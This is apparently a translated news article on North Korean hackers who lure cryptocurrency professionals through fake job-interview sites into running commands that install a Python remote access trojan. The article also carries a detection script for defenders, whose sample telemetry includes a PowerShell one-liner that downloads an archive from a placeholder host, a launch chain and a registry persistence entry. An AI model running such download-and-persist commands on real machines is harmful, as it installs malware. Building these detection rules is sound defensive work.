North Korean attackers exploit cryptocurrency recruitment to spread malware through sophisticated phishing campaigns

North Korean hackers tracked as Famous Chollima have been targeting cryptocurrency professionals with phishing attacks delivered through fake recruitment websites. The goal is to harvest genuine personal data and to install malware on victims' devices. The malware steals credentials and session data from more than 80 browser extensions, including cryptocurrency wallets such as MetaMask, TronLink and MultiverseX, as well as password managers such as 1Password and NordPass.

Attack methods through fake recruitment websites

Cisco Talos research indicates that the group impersonates well-known companies such as Coinbase, Uniswap and Robinhood to lure victims onto fake skill-assessment websites. There, victims are asked to enter personal information and answer technical questions, which either harvests their data directly or leads them to download malware onto their devices. Based on open-source analysis, the victims are located mainly in India.

Clear links to the North Korean hacker group

Cisco Talos has documented a new Python-based malware, named 'PylangGhost', attributed to the group tracked as Famous Chollima (also known as 'Wagemole'). It is a remote access trojan (RAT) that reproduces much of the functionality of the earlier GolangGhost variant, and it targets Windows systems. The group's activity in this space dates back to 2024, with a series of campaigns built on fake job advertisements and convincing skill-assessment sites.

Phishing attack campaign through fake interviews

In the latest campaign, candidates are asked to grant camera access for a video interview and are then instructed to execute commands supplied by the site. The file 'nvidia.py' launches the RAT, creates a registry value for persistence, connects to the command-and-control (C2) server and enters a command loop. The commands shown to the victim are tailored to their browser and operating system, using PowerShell, Bash or Command Shell, so that the implant runs in whatever environment the victim has.
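The execution chain described above (a victim pasting a command into a shell, a script host starting a Python interpreter from a user-writable directory, and a registry value added for persistence) is a useful target for detection logic. The following is an added example, not code from the original article or from Cisco Talos: it runs a few hypothetical rules over constructed, Sysmon-like telemetry. The field names, the Run-key location, the directory and downloader patterns, and the sample events are all assumptions chosen to illustrate the chain, not confirmed indicators of PylangGhost.

```python
"""Detection sketch for a copy-paste lure that ends in a Python RAT.

Added example for illustration. The telemetry schema (dicts with
type/parent/image/cmdline or key/value/data) is an assumption, and the
SAMPLE_EVENTS below are constructed, not captured from a real incident.
"""
import re

# Constructed sample telemetry (hypothetical, Windows only).
SAMPLE_EVENTS = [
    # 1. User pastes a download-and-run one-liner into PowerShell.
    {"id": 1, "type": "process", "user": "alice", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": r"powershell -c Invoke-WebRequest -Uri https://update.example.invalid/nvidia_driver.zip -OutFile $env:TEMP\nvidia_driver.zip"},
    # 2. The archive's VBS launcher is run by the script host.
    {"id": 2, "type": "process", "user": "alice", "parent": "powershell.exe",
     "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\nvidia_driver\update.vbs"},
    # 3. The script host starts a bundled interpreter on nvidia.py.
    {"id": 3, "type": "process", "user": "alice", "parent": "wscript.exe",
     "image": "python.exe",
     "cmdline": r"C:\Users\alice\AppData\Local\Temp\nvidia_driver\python.exe nvidia.py"},
    # 4. The RAT persists via a Run-key value (assumed location).
    {"id": 4, "type": "registry", "user": "alice", "image": "python.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "nvidia",
     "data": r"C:\Users\alice\AppData\Local\Temp\nvidia_driver\python.exe nvidia.py"},
    # 5. Benign noise: a developer running a script from a project directory.
    {"id": 5, "type": "process", "user": "bob", "parent": "explorer.exe",
     "image": "python.exe",
     "cmdline": r"python.exe C:\Users\bob\src\build.py"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Matches \AppData\, %TEMP%, $env:TEMP\, \Downloads\ and similar user-writable paths.
USER_WRITABLE = re.compile(r"(?:\\|%|\$env:)(?:appdata|temp|downloads)(?:\\|%)", re.I)
DOWNLOADER = re.compile(r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?$", re.I)
PY_INTERP = re.compile(r"python(?:w)?(?:\d+)?\.exe", re.I)


def check_event(ev):
    """Return the list of rule names that fire on a single event."""
    hits = []
    if ev["type"] == "process":
        parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev["cmdline"]
        # R1: a shell downloads something into a user-writable directory.
        if image in SHELLS and DOWNLOADER.search(cmd) and USER_WRITABLE.search(cmd):
            hits.append("R1_shell_download_to_user_dir")
        # R2: a script host starts a Python interpreter from a user-writable directory.
        if parent in SCRIPT_HOSTS and PY_INTERP.search(image) and USER_WRITABLE.search(cmd):
            hits.append("R2_script_host_to_python_in_user_dir")
    elif ev["type"] == "registry":
        # R3: a Run-key value points at a Python interpreter/script in a user-writable directory.
        if RUN_KEY.search(ev["key"]) and PY_INTERP.search(ev["data"]) and USER_WRITABLE.search(ev["data"]):
            hits.append("R3_run_key_python_persistence")
    return hits


def detect(events):
    """Run every rule over every event; return (event id, user, rule) triples."""
    return [(ev["id"], ev["user"], rule) for ev in events for rule in check_event(ev)]


def correlate(findings):
    """Users for whom the whole chain (R1, R2 and R3) fired; sorted for stable output."""
    by_user = {}
    for _, user, rule in findings:
        by_user.setdefault(user, set()).add(rule.split("_")[0])
    return sorted(u for u, rules in by_user.items() if rules >= {"R1", "R2", "R3"})


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for event_id, user, rule in found:
        print(f"event {event_id} user={user} {rule}")
    print("full chain observed for:", correlate(found))
```

Each rule alone is noisy (developers run Python from their home directories all the time, as event 5 shows), which is why the correlation step only escalates when the download, the script-host launch and the persistence write all appear for the same user. In a real deployment the rules would be keyed on process GUIDs and time windows rather than on the user name alone.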

The impact of the North Korean hacker group on the global cryptocurrency market

Beyond stealing directly from exchanges, these hackers also target crypto professionals to gather strategic information and to infiltrate cryptocurrency companies. In 2025, the North Korean group used fake front companies such as BlockNovas LLC and SoftGlide LLC to distribute malware through fake interviews, before the FBI seized the front companies' domains.

North Korea's role in sophisticated attack schemes

In October 2024, North Korean attackers compromised Radiant Capital by sending an engineer a malware-laced file disguised as a PDF, then used the implanted code to steal about $50 million through unauthorized withdrawals; Radiant attributed the attack to North Korea in December 2024. The governments of Japan, South Korea and the United States jointly confirmed that groups such as Lazarus stole at least $659 million through a series of cryptocurrency breaches in 2024. The proceeds of these operations fund the regime's weapons programs.

Data and Predictions on North Korean hacker attack activities

Chainalysis analyst Erin Plante describes North Korean state hackers as the most active threat actor in the cryptocurrency sector. In 2022 they stole an estimated $1.7 billion in cryptocurrency, nearly four times the $428.8 million stolen in 2021. Notably, the exchange Kraken identified and stopped a North Korean operative who was posing as a job applicant during its online recruitment process.

Source: https://tintucbitcoin.com/tan-cong-trieu-tien-qua-tuyen-dung-tien-so/
